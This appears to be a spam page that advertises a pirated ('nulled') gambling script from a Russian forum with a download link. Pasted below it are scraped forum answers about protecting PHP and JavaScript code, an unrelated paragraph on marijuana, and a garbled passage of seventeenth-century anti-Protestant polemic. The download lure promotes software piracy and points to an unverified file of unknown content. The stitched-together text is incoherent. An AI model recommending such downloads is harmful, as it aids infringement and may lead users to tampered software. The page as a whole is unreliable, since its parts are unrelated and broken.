Hello my friends,today i have a beautiful gambling script from a russian forum here.It has a really cool admin panel functions like a console for the bot and something like that.Enjoy and have Fun!
I dont know what to say. About 3 days ago I released a script to the public. Today I realised, after searching on google that someone had already nulled (removed my protection) and pirated the script.
Hot Or Not Script Nulled Script
Download File: https://wallprofothal.blogspot.com/?download=2vC7Kp
Any code that is released public has a chance of being hacked. This is the number one reason why Javascript is not secure. No matter how much you will obfuscate it, compress it or translate it to some random japanese dialect, it is still source code that the user has access to. Hence it should not contain any sensible information such as passwords or such. All sensible data should be stored in the server side where it is kept hidden from the user.
If you are releasing a php framework containing both the server and client code; then you have no way of fully protecting yourself. PHP is, like Javascript, an interpreted language. You may translate it, compress it, or obfuscate it as much as you want, (and it's probably the best thing you can do) you will never fully protect it when released to the public.
Also keep in mind that DRM and other solutions are often controversial, and will reduce your sales (especially among early-adopters). On a personal level, I would suggest viewing this as a compliment. After all, your script was useful enough that someone bothered to pirate it within a week!
PHP is easily decoded, so for people who really want to know, it's easy to find out the source code. However, there are certain obfuscator programs such as this one that'll make your PHP script almost unreadable for those trying to decode it.
Try ionCube or Zend Guard. They are both commercial offerings, but you say that you are selling your software so it might be worth it. Although nothing is foolproof and can be reverse engineered with enough effort and technical skill, these solutions are probably good enough for the average PHP script vendor.
I agree with Samoz's suggestion to keep the logic server side, however this can often be hard to do. The best strategy is to make the user want to buy it by offering updates automatically to registered users, as well as installation, advice and good support. You are never going to sway people hell bent on pirating, however your goal should be to persuade those who are undecided as to whether to pirate or purchase the script.
Jumping in very late to this conversation, but saw this question featured. Nobody mentioned contacting a lawyer and pursuing litigation. You likely saw the script on a server - hosted by a known hosting company - you can probably get a DMCA takedown to have the script removed. If you really press the case, you may be able to sue for damages.
If your script won't consume a lot of bandwidth, you could keep your "logic" server-side, as samoz suggested, but if your users won't use it responsively ( a crawler, for example ), this could be trouble.
In general it's hard to prevent users from stealing code when the program is written in a scripting language and distributed in plain text. I've found that did a really nice job of being able to sell PHP code but still give the code to users.
I'm learning about web development and I just came across the term "nulled script". I googled it, but I still don't get it. What does it mean? I don't really understand how open source php, javascript web software in a LAMP environment can be protected or at least how the software can call home if it's modified or transfered to a new server... I would be great if somebody could explain it in a few words. Thanks. (Just to make it clear: I don't want to steal code. I am interested in protecting my own code.)
A nulled script is when somebody changes a script to remove the protection implemented by the author. For example, when they remove call homes or registration checks or etc. These scripts are commonly distributed by shady/warez sites.
Although nearly impossible to detect from original author, I have no idea of the legal implications from removing call-home code in a script, javascript code has to be accessible to be of any use and is not compiled. As for removing copyrights and licensing information in a script, (also very hard to detect) this is pretty much illegal as far as I know.
That would be more of an LSD thing. Mary Jane is about giggles and munchies. My 80-year old mom recently enquired about it having been suffering for years from horrible pains caused by a chronic nerve infection in her spine. Being maxed out on her current pain killers, she had refused a morphine prescription, wanting to check out some alternatives like acupuncture and marijuana instead. Which she had found out about on Google.
MAhumet, and his followers ascribe such perfection to the Alcoran, as that theyCusantis in cribatione Alcorain. l. 1. & 2. & Richardus Ordi [...]is Praedicat. in confutat. legis Saracen. made it the bounda [...]y of their Religion; belieuing or giuing credit to nothing, which was not found expresly set downe therein; not performing any thing not written therein; So much they sleighted the force of all Traditions, though most ancient. And hereupon we find an Authour in these patricular words to discourse of this point: Est in Turcarum Beinbus [...]slor, V [...]gnet. l. 4. legibus, vt quae sua lingua scripta non sunt, ea praestari non est necesse.
But to proceed further. The Prince of Condy Matth. de Lanoy en s [...] replique. l. [...]. chap. 13. in France in the yeare 1570. being banished France, and retiring himselfe to Basill, and consulting there, how to raise Rebellion against the King of France; The Protestant Ministers of that City perswaded him, to be subiect himselfe to the Turkish Emperour, and craue assistance of him. In like sort we Frenchmen, or rather, we Franco-Turca in the Rebellion to the yeare 1568. made a Petition to the Turke for ayde, against our owne Soueraigne King, and Country; giuing our reasons thereof to the Turkish Embassadour in these Wordes? [Page 97] Quia In literii Constantinop. scriptis ad Venetum Patricium, in fine libri de furoribus Gallisis, fides Protestantiam, Turcicae erat quàm simillima. Because the fayth of the Protestants, was most lyke to the Turkish fayth: As also in that, the Protestant Princes of Germany fauouring the Turkish Emperour, might hinder all the designes of the Roman Emperour.
Another Protestant writeth in like sort a booke entituled: Antiparaeus; Hoc est, Refutatio venenati scripti à Dau [...]de Paraeo editi, in defensionem stropharum & corruptelarum, quibus loannes Caluinus illustrissima Scripturae Testimonia, de Mysterio Trinitatis, nec non Oracul [...] Prophet arum de Chr [...]sto, detestandum in modum corrupit. Francosurti, Anno 1598. Thus: Antiparaeus; that is, A Refutation of the virulent writing, made by Dauid Paraeus in the defence of the impostures and Corruptions, [Page 100]by the which Iohn Caluin derestably dep [...] neth the most euident Testimonies of the Scripture, touching the Mystery of the Trinity, as also the Oracles of the Prophets, concerning Christ.
To be short a Fourth Protestant writeth a Treatise, bearing this Inscription: Oratio de Incarnatione filij Dei, contr [...] imp [...]os, & blasphemos Errores Swinghanorum, & Galuinistarum, Tubingae, 1586. An Oration, or discourse of the Incarnation of the Sonne of God, against the wicked and blasphemeus Errours of the Swinglians and Caluinists.
Henry the eight was by byrth King of England, and Ireland (a great Monarchy) and did runne in the same line with Mahumet. For he was the first Christian Prince, who either in those Nations, or throughout all [Page 113] [...]ur [...]pe, assumed to himselfe the Title of Head Vide Sand. de Schismats A [...]gli [...]. of the Church, and decread by a Parlament or (generall meeting togeath [...] of all the States of the Realme) that all C [...]no [...] of the Church, and Councells, formerly [...]nacted, should be wholy [...]iec [...]ed and dis [...] nulled; those only excepted, which himselfe vouchsafed to app [...]ou [...]. And accordingly such Canons and decrees, which himselfe, and some few, others substi [...]ured by him, did make, wer [...] to be reputed as sincere and Euangelicall, being warranted vnder his Letters Patents, and Regall Seale.
Thus far (or rather to much) of this dista [...]tfull subiect. Only I refer to the Censure euen of your selues, my Countrymen; (for I do not feare partiality in so cleare a point) whether after you haue per [...]sect diligently all the Premisses you be perswaded, that Mahumet, or your Prime Maisters, haue borne greater veneration, and reuerence to the Mother of Christ, our Redeemer: yet before my Pen here cease, let it turne it selfe particularly to thee, O B. Virgin, and by dece [...]ping some Panegyricks out of the ancien [...] Fathers, and other Doctours, deliuered vpon thee, celebrate in part thy praiser. Thou art then both [...] Gregory Nyssene Orat. [...]. de Natiuit. Christi. Mother, and a Virgin, Neither did thy Virginity take away thy Chil [...]byrth, no [...] thy Childbi [...] [...] thy Virginity. Only Ierom. l. [...]. contra Pelag. c. 2. Christ did open the closed gate of thy Virgin [...] [...]ombe, which neuerthelesse euer continued soul. Thou art the Proclu [...] Constantin. [...]rat. de Na [...]iuit, Christi. Temple of God [...]hou art the Mansion of Heauen and earth. Thou art the Win [...]our Fulgentius, serm. de laud. B Virg. of Heauen, because through thee. God did send forth true light to all Ages: Thou in tyme di [...] Methodius orat. in Hypag. This Father liued in the second age after Christ. bring fore [...] him, who was con [...]e [...]ued before all tyme. Thou art the Methodius ibid. circumscription of him, who cannot be circumscribed; the comprehension of him, who comprehendeth all things. Thou Proclus Constant. Homil. de Natiuit. Christi. art the shop, wherein the two Natures are vnited; the Bedchamber, Proclus vbi suprd wherein the Word espoused human flesh: or the Bridge by which God descended from heauen. Thou art Higher, Athauasius in Euang de Beate Virgine. then the Blessed of Heauen, more honorable, then the Cherubims, more [Page 138]holy then the Seraphims, more glorious then all the Hosts of Heauen. Finally. As Eua [...]eu [...]us contr [...] Haeres. circa [...] dium. was seduced. that thereby the might fly from God; So thou (Mary) art perswaded to obey God, that so Mary (being a Virgin) might be an Aduocate for Eua a Virgin. 2ff7e9595c